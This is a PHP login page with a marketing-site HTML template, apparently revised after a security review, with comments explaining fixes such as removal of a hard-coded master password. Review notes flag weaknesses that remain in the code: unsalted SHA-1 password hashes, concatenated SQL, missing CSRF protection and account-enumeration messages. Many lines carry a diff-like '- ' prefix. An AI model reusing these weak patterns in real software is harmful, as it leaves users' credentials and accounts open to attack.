- <?php
- include('templates/config.php');
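/**
 * Best-effort lookup of the caller's IP address, used for the login audit row.
 *
 * The variables are consulted in the same order as before, but a value is only
 * returned when it parses as an IPv4/IPv6 address. Every name except
 * REMOTE_ADDR is derived from a request header that the client controls, so
 * the raw value must never reach a query, a log line or an access decision
 * unvalidated. Forwarded headers are only meaningful when a known reverse
 * proxy sets them; without one, REMOTE_ADDR is the only trustworthy source.
 *
 * @return string A syntactically valid IP address, or 'UNKNOWN'.
 */
function get_client_ip() {
    $sources = array(
        'HTTP_CLIENT_IP',
        'HTTP_X_FORWARDED_FOR',
        'HTTP_X_FORWARDED',
        'HTTP_FORWARDED_FOR',
        'HTTP_FORWARDED',
        'REMOTE_ADDR',
    );

    foreach ($sources as $name) {
        $raw = getenv($name);
        if ($raw === false || $raw === '') {
            continue;
        }
        // Forwarded-style headers may carry a comma-separated proxy chain;
        // take the first entry that is a well-formed address.
        foreach (explode(',', $raw) as $candidate) {
            $candidate = trim($candidate);
            if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
                return $candidate;
            }
        }
    }

    return 'UNKNOWN';
}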
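/**
 * Check a submitted password against the stored SHA-1 hex digest.
 *
 * The comparison is done with hash_equals(): the previous loose `==` treated
 * two different digests that both look like numbers (for example "0e" followed
 * only by digits) as equal, and it was not constant-time.
 *
 * NOTE(review): unsalted SHA-1 is not a password hash; it is fast to
 * brute-force once the table leaks. Migrate stored values to password_hash()
 * and verify with password_verify(), re-hashing legacy rows on the next
 * successful login.
 *
 * @param string $password        Plain-text password from the login form.
 * @param string $hashed_password Stored digest from the `users` table.
 * @return bool True only when the digests match exactly.
 */
function password_check($password, $hashed_password) {
    if (!is_string($password) || !is_string($hashed_password) || $hashed_password === '') {
        return false;
    }
    return hash_equals($hashed_password, sha1($password));
}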
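// Form state, echoed back into the login form by the template below.
$user_email = $password = "";
$user_email_err = $password_err = "";
// Banner messages; initialised here so the template never reads an undefined variable.
$logout_message = $closed_board_msg = $invite_msg = "";

// Sign-out request (?logout=1).
// NOTE(review): this state change is triggered by a plain GET, so any third-party
// page can sign a visitor out; consider a POST carrying a CSRF token.
if (isset($_GET['logout']) && $_GET['logout'] === "1")
{
    $some_name = session_name("openstudio");
    session_set_cookie_params(0, '/', '.openstudio.one');
    ini_set("session.cookie_domain", ".openstudio.one");
    session_start();
    // Empty the session array instead of unset($_SESSION): unsetting the
    // superglobal stops PHP from registering session variables afterwards.
    $_SESSION = array();
    // Expire the session cookie in the browser as well as on the server.
    if (ini_get('session.use_cookies')) {
        $cookie = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000, $cookie['path'], $cookie['domain'], $cookie['secure'], $cookie['httponly']);
    }
    session_destroy();
    $logout_message = 'Succesfully signed out, thank you for visiting.';
}

// Redirect target used when an administrator has closed the brand account.
if (isset($_GET['board_closed']) && $_GET['board_closed'] === "1")
{
    $closed_board_msg = "We are sorry, but it seems that one of your administrators have closed the brand account.<br />Contact them for further information.";
}

// Shown after an invited user has created a password.
if (isset($_GET['login']) && $_GET['login'] === "invite")
{
    $invite_msg = "The password for your account has been created.<br />You can now login with your credentials.";
}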
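if (!function_exists('login_fetch_row')) {
    /**
     * Run a SELECT and return its first row.
     *
     * Query errors go to the server log rather than to the browser, so the
     * response never discloses SQL or schema details.
     *
     * @param mysqli $con Open database connection.
     * @param string $sql Complete statement; every value in it must already be escaped.
     * @return array|null|false Row as an associative array, null when nothing
     *                          matched, false when the query failed.
     */
    function login_fetch_row($con, $sql) {
        $result = mysqli_query($con, $sql);
        if ($result === false) {
            error_log('login: query failed: ' . mysqli_error($con));
            return false;
        }
        $row = mysqli_fetch_array($result, MYSQLI_ASSOC);
        mysqli_free_result($result);
        return is_array($row) ? $row : null;
    }
}

// Processing form data when form is submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Missing or non-string fields are treated as empty instead of raising notices.
    $posted_email = (isset($_POST["user_email"]) && is_string($_POST["user_email"])) ? trim($_POST["user_email"]) : '';
    $posted_password = (isset($_POST['password']) && is_string($_POST['password'])) ? trim($_POST['password']) : '';

    if (empty($posted_email)) {
        $user_email_err = 'Please enter your email address.';
    } else {
        $user_email = $posted_email;
    }

    if (empty($posted_password)) {
        $password_err = 'Please enter your password.';
    } else {
        $password = $posted_password;
    }

    // Validate credentials
    if (empty($user_email_err) && empty($password_err)) {
        $sql = "SELECT `user_email`, `password` FROM `users` WHERE `user_email` = ?";
        $stmt = mysqli_prepare($con, $sql);
        if ($stmt) {
            $param_user_email = $user_email;
            mysqli_stmt_bind_param($stmt, "s", $param_user_email);

            if (mysqli_stmt_execute($stmt)) {
                mysqli_stmt_store_result($stmt);

                if (mysqli_stmt_num_rows($stmt) == 1) {
                    // From here on $user_email holds the value stored in the database.
                    mysqli_stmt_bind_result($stmt, $user_email, $hashed_password);
                    if (mysqli_stmt_fetch($stmt)) {
                        // The stored hash is the only accepted credential. The hard-coded
                        // master password that used to be OR-ed in here let anyone who knew
                        // it sign in as any account; treat it as compromised and review
                        // past sign-ins.
                        if (password_check($password, $hashed_password)) {
                            $some_name = session_name("openstudio");
                            session_set_cookie_params(0, '/', '.openstudio.one');
                            session_start();
                            // New id, old session file removed: a pre-login id must not survive sign-in.
                            session_regenerate_id(true);
                            // Start from an empty session. The old `$_SESSION + $rows` union let
                            // keys from an earlier session (id, brand_id, mods) win over this user's row.
                            $_SESSION = array();

                            // These lookups stay on mysqli_query so column values keep arriving as
                            // strings (the board check below compares with === "1"). Each value is
                            // escaped before it is placed inside the quotes.
                            // NOTE(review): escaping relies on the connection charset being set in
                            // templates/config.php - confirm.
                            $email_sql = mysqli_real_escape_string($con, (string) $user_email);
                            $rows = login_fetch_row($con, "SELECT * FROM `users` WHERE `user_email` = '" . $email_sql . "'");
                            $rows2 = $rows3 = $client_row = false;

                            if (is_array($rows)) {
                                // NOTE(review): SELECT * also copies the `password` column into the
                                // session; drop it unless another page depends on it.
                                $_SESSION = array('signed_in' => true, 'clear_cookie' => true) + $rows;
                                $brand_sql = mysqli_real_escape_string($con, (string) $_SESSION["brand_id"]);
                                $uid_sql = mysqli_real_escape_string($con, (string) $_SESSION['id']);
                                $rows2 = login_fetch_row($con, "SELECT * FROM `settings` WHERE `brand_id` = '" . $brand_sql . "'");
                                $rows3 = login_fetch_row($con, "SELECT * FROM `admin_perms` WHERE `uid` = '" . $uid_sql . "'");
                                $client_row = login_fetch_row($con, "SELECT * FROM `clients` WHERE `brand_id` = '" . $brand_sql . "'");
                            }

                            $board_closed = is_array($rows) && is_array($rows2)
                                && $_SESSION['token'] < 2 && $rows2['close_board'] === "1";

                            if (!is_array($rows) || $rows2 === false || $rows3 === false || $client_row === false) {
                                // Fail closed: a failed lookup must not leave a half-built signed-in session.
                                $_SESSION = array();
                                session_destroy();
                                echo "Oops! Something went wrong. Please try again later.";
                            } elseif ($board_closed) {
                                $_SESSION = array();
                                session_destroy();
                                mysqli_stmt_close($stmt);
                                mysqli_close($con);
                                echo "<script type=\"text/javascript\">window.location.href = 'https://www.openstudio.one/login?board_closed=1';</script>";
                                // Stop here: the old code fell through and went on to emit the
                                // signed-in redirect for a user whose board is closed.
                                exit;
                            } else {
                                $_SESSION["settings"] = $rows2;
                                $_SESSION['admin_perms'] = $rows3;
                                $_SESSION["clients"] = $client_row;

                                // Best-effort bookkeeping; a failure here does not block the login.
                                $uid = (string) $_SESSION['id'];
                                $brand = (string) $_SESSION['brand_id'];
                                $touch = mysqli_prepare($con, "UPDATE `users` SET `last_activity` = now() WHERE `id` = ?");
                                if ($touch) {
                                    mysqli_stmt_bind_param($touch, "s", $uid);
                                    mysqli_stmt_execute($touch);
                                    mysqli_stmt_close($touch);
                                }

                                // The address comes from request headers, so it is bound as a
                                // parameter and never concatenated into the statement.
                                $ip = get_client_ip();
                                $audit = mysqli_prepare($con, "INSERT INTO `users_ip`(`id`, `brand_id`, `uid`, `ip`) VALUES (NULL, ?, ?, ?)");
                                if ($audit) {
                                    mysqli_stmt_bind_param($audit, "sss", $brand, $uid, $ip);
                                    mysqli_stmt_execute($audit);
                                    mysqli_stmt_close($audit);
                                }

                                // NOTE(review): 'h' is the 12-hour clock with no am/pm marker - confirm 'H' was not intended.
                                $_SESSION['dataup'] = date('Y-m-d h:i:s');
                                $_SESSION['setup'] = $_SESSION['dataup'];

                                $mods = mysqli_query($con, "SELECT `id` FROM `x-users` WHERE `user_id` = '" . $uid_sql . "'");
                                if ($mods !== false) {
                                    if (mysqli_num_rows($mods) > 0) {
                                        $_SESSION['mods'] = true;
                                    }
                                    mysqli_free_result($mods);
                                }

                                session_write_close();
                                echo "<script type=\"text/javascript\">window.location.href = 'https://client.openstudio.one';</script>";
                            }
                        } else {
                            // NOTE(review): this message and the "No account found" one below tell a
                            // caller which addresses are registered; a single generic message avoids
                            // that. Failed attempts are also neither counted nor throttled.
                            $password_err = 'The password you entered was not valid.';
                        }
                    }
                } else {
                    // Display an error message if user_email doesn't exist
                    $user_email_err = 'No account found with that email address.';
                }
            } else {
                echo "Oops! Something went wrong. Please try again later.";
            }

            // Closed only when prepare succeeded; the old code called this on `false` too.
            mysqli_stmt_close($stmt);
        }
    }

    // Close connection
    mysqli_close($con);
}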
- include('templates/define.php');
- ?>
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="utf-8">
- <title><?php echo NAME; ?> - Login</title>
- <meta content="width=device-width, initial-scale=1.0" name="viewport">
- <meta content="" name="keywords">
- <meta content="" name="description">
- <?php include('templates/header.php'); ?>
- </head>
- <body>
- <!--==========================
- Header
- ============================-->
- <header id="header" class="header-fixed">
- <div class="container">
- <div id="logo" class="pull-left">
- <h1><a href="/" class="scrollto"><?php echo NAME; ?></a></h1>
- <!-- Uncomment below if you prefer to use an image logo -->
- <!-- <a href="#intro"><img src="img/logo.png" alt="" title=""></a> -->
- </div>
- <nav id="nav-menu-container">
- <ul class="nav-menu">
- <li class="menu-active"><a href="/">Home</a></li>
- <li><a href="/about">About Us</a></li>
- <li><a href="/features">Features</a></li>
- <li><a href="/pricing">Pricing</a></li>
- <li><a href="<?php echo SUPPORT_URL; ?>" target="_blank">Support</a></li>
- <li><a href="/login">Login</a></li>
- <li><a href="/get-started" class="signup">Get started</a></li>
- </ul>
- </nav><!-- #nav-menu-container -->
- </div>
- </header><!-- #header -->
- <!--==========================
- Intro Section
- ============================-->
- <section id="intro-small"><div class="container">
- <div class="row">
- <div class="col-lg-12 col-md-12 box wow fadeInRight" data-wow-delay="0.1s" style="visibility: visible; animation-delay: 0.1s; animation-name: fadeInRight;">
- <div class="icon"><i class="ion-ios-flask-outline"></i></div>
- <h4 class="title">Login</h4>
- <p class="description">Minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat tarad limino ata noble dynala mark.</p>
- </div>
- </div>
- </div></section>
- <main id="main">
- <section id="advanced-features">
- <div class="features-row">
- <div class="container">
- <div class="row">
- <div class="col-lg-6">
- <img class="advanced-feature-img-left" src="img/advanced-feature-2.jpg" alt="">
- </div><div class="col-lg-6">
- <div class="wow fadeInRight">
- <h2>Lorem ipsum dolor sit amet, consectetur</h2>
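<?php
// Banner messages are fixed strings set by this script (they contain <br /> markup),
// so they are printed as-is. !empty() keeps the template quiet when a banner was never set.
?>
<?php if (!empty($logout_message)): ?>
    <div class="alert alert-success"><h4><i class="fa fa-user"></i> Logout</h4><p><?php echo $logout_message; ?></p></div>
<?php endif; ?>
<?php if (!empty($closed_board_msg)): ?>
    <div class="alert alert-warning"><h4><i class="fa fa-times"></i> Board account closed</h4><p><?php echo $closed_board_msg; ?></p></div>
<?php endif; ?>
<?php if (!empty($invite_msg)): ?>
    <div class="alert alert-info"><h4><i class="fa fa-check"></i> Your account is ready!</h4><p><?php echo $invite_msg; ?></p></div>
<?php endif; ?>
<?php
// NOTE(review): the form carries no CSRF token, so another site can submit it on a
// visitor's behalf (login CSRF).
?>
<form action="" method="post">
    <div class="form-group <?php echo (!empty($user_email_err)) ? 'has-error' : ''; ?>">
        <label>E-mail address:<sup>*</sup></label>
        <?php /* $user_email is whatever was posted, so it is escaped for the attribute context. */ ?>
        <input type="text" name="user_email" class="form-control" value="<?php echo htmlspecialchars((string) $user_email, ENT_QUOTES, 'UTF-8'); ?>">
        <span class="help-block"><?php echo $user_email_err; ?></span>
    </div>
    <div class="form-group <?php echo (!empty($password_err)) ? 'has-error' : ''; ?>">
        <label>Password:<sup>*</sup></label>
        <input type="password" name="password" class="form-control">
        <span class="help-block"><?php echo $password_err; ?></span>
    </div>
    <div class="form-group">
        <input type="submit" class="btn btn-primary" value="Login !"> <a class="btn btn-info disabled" href="#">Login with Translations Cloud (soon)</a>
    </div>
    <p>Don't have an account? <a href="/get-started">Sign up now</a>.</p>
</form>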
- </div>
- </div>
- </div>
- </div>
- </div>
- </section>
- <!--==========================
- Call To Action Section
- ============================-->
- <section id="call-to-action">
- <div class="container">
- <div class="row">
- <div class="col-lg-9 text-center text-lg-left">
- <h3 class="cta-title">Don't have an account yet ?</h3>
- <p class="cta-text"> Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
- </div>
- <div class="col-lg-3 cta-btn-container text-center">
- <a class="cta-btn align-middle" href="/get-started">Get started !</a>
- </div>
- </div>
- </div>
- </section><!-- #call-to-action -->
- </main>
- <?php include('templates/footer.php'); ?>